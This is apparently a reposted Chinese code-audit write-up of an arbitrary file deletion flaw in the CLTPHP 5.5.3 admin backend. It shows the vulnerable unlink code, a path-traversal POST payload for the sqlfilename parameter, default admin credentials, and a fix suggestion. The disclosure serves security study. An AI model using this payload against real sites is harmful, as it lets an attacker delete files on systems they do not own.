2. 程式人生 > >【程式碼審計】CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

【程式碼審計】CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

阿新 發佈:2018-12-02

 

0x00 環境準備

CLTPHP官網:http://www.cltphp.com

網站原始碼版本:CLTPHP內容管理系統5.5.3版本

程式原始碼下載:https://gitee.com/chichu/cltphp

預設後臺地址: http://127.0.0.1/admin/login/index.html

預設賬號密碼: 後臺登入名:admin  密碼:admin123

測試網站首頁:

0x01 程式碼分析

1、/app/admin/controller/Database.php  第221-248行:

  1. public function delSqlFiles() {  
  2.     $batchFlag = input('param.batchFlag', 0, 'intval');  
  3.     //批量刪除  
  4.     if ($batchFlag) {  
  5.         $files = input('key', array());  
  6.     }else {  
  7.         $files[] = input('sqlfilename' , '');  
  8.     }  
  9.     if (empty($files)) {  
  10. 10.         $result['msg'] = '請選擇要刪除的sql檔案!';  
  11. 11.         $result['code'] = 0;  
  12. 12.         return $result;  
  13. 13.     }  
  14. 14.   
  15. 15.     foreach ($files as $file) {  
  16. 16.         $a = unlink($this->datadir.'/' . $file);  
  17. 17.     }  
  18. 18.     if($a){  
  19. 19.         $result['msg'] = '刪除成功!';  
  20. 20.         $result['url'] = url('restore');  
  21. 21.         $result['code'] = 1;  
  22. 22.         return $result;  
  23. 23.     }else{  
  24. 24.         $result['msg'] = '刪除失敗!';  
  25. 25.         $result['code'] = 0;  
  26. 26.         return $result;  
  27. 27.     }  

28. }  

 

在這段函式中,引數sqlfilename未經任何處理,直接帶入unlink函式中刪除,導致程式在實現上存在任意檔案刪除漏洞,攻擊者可通過該漏洞刪除任意檔案。

0x02 漏洞利用

1、 在根目錄新建test.txt,作為漏洞測試檔案

 

2、 構造URL,成功刪除根目錄的1.txt檔案

http://127.0.0.1/admin/Database/delSqlFiles.html

POST: sqlfilename=..\\..\\1.txt

 

 

0x03 修復建議

1、對於要刪除的檔案,通過正則判斷使用者輸入的引數的格式,看輸入的格式是否合法。

 

最後

歡迎關注個人微信公眾號:Bypass--,每週原創一篇技術乾貨。 

 

 

相關推薦

程式碼審計CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計CLTPHP_v5.5.3後臺任意檔案下載漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計CLTPHP_v5.5.3後臺目錄遍歷漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計CLTPHP_v5.5.3 前臺任意檔案上傳漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計CLTPHP_v5.5.3前臺XML外部實體注入漏洞分析

0x01 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/login/index

代碼審計CLTPHP_v5.5.3後臺任意文件下載漏洞分析

func attach database 9.png jpg 允許 left 簡單 服務 0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站源碼版本:CLTPHP內容管理系統5.5.3版本 程序源碼下載:https://git

代碼審計CLTPHP_v5.5.3後臺任意文件刪除漏洞分析

login alt flag div 網站源碼 用戶 urn 測試 result 0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站源碼版本:CLTPHP內容管理系統5.5.3版本 程序源碼下載:https://gitee.c

程式碼審計EasySNS_V1.6 前臺XSS跨站指令碼漏洞分析

  0x00 環境準備 EasySNS官網:http://www.imzaker.com/ 網站原始碼版本:EasySNS極簡社群V1.60 程式原始碼下載:http://es.imzaker.com/index.php/Topic/gview/id/92.html 預設後臺地址:http

程式碼審計eduaskcms_v1.0.7前臺儲存型XSS漏洞分析

  0x00 環境準備 eduaskcms官網:https://www.eduaskcms.xin 網站原始碼版本:eduaskcms-1.0.7 程式原始碼下載:https://www.eduaskcms.xin/download/show/5.html 預設後臺地址:http://12

程式碼審計YUNUCMS_v1.0.6 後臺程式碼執行漏洞分析

  0x00 環境準備 QYKCMS官網:http://www.yunucms.com 網站原始碼版本:YUNUCMSv1.0.6 程式原始碼下載:http://www.yunucms.com/Download/index.html 測試網站首頁:   0x01 程式碼分析

程式碼審計XYHCMS V3.5任意檔案刪除漏洞分析

  0x00 環境準備 XYHCMS官網:http://www.xyhcms.com/ 網站原始碼版本:XYHCMS V3.5(2017-12-04 更新) 程式原始碼下載:http://www.xyhcms.com/Show/downl

程式碼審計YzmCMS_PHP_v3.6 任意檔案刪除漏洞分析

  0x00 環境準備 YzmCMS官網:http://www.yzmcms.com/ 程式原始碼下載:http://pan.baidu.com/s/1pKA4u99 測試網站首頁:   0x01 程式碼分析 1、檔案位置: /application/member/contr

程式碼審計大米CMS_V5.5.3 後臺多處儲存型XSS漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

程式碼審計大米CMS_V5.5.3 目錄遍歷漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

程式碼審計大米CMS_V5.5.3 任意檔案讀取漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

程式碼審計大米CMS_V5.5.3 任意檔案刪除程式碼執行漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

程式碼審計大米CMS_V5.5.3 SQL注入漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

程式碼審計大米CMS_V5.5.3 程式碼執行漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

程式碼審計五指CMS_v4.1.0 後臺存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

程式碼審計XIAOCMS_後臺database.php頁面存在SQL注入漏洞

  0x00 環境準備 XIAOCMS官網: http://www.xiaocms.com/ 網站原始碼版本:XiaoCms (釋出時間:2014-12-29) 程式原始碼下載:http://www.xiaocms.com/download/XiaoCms_20141229.zip 測試網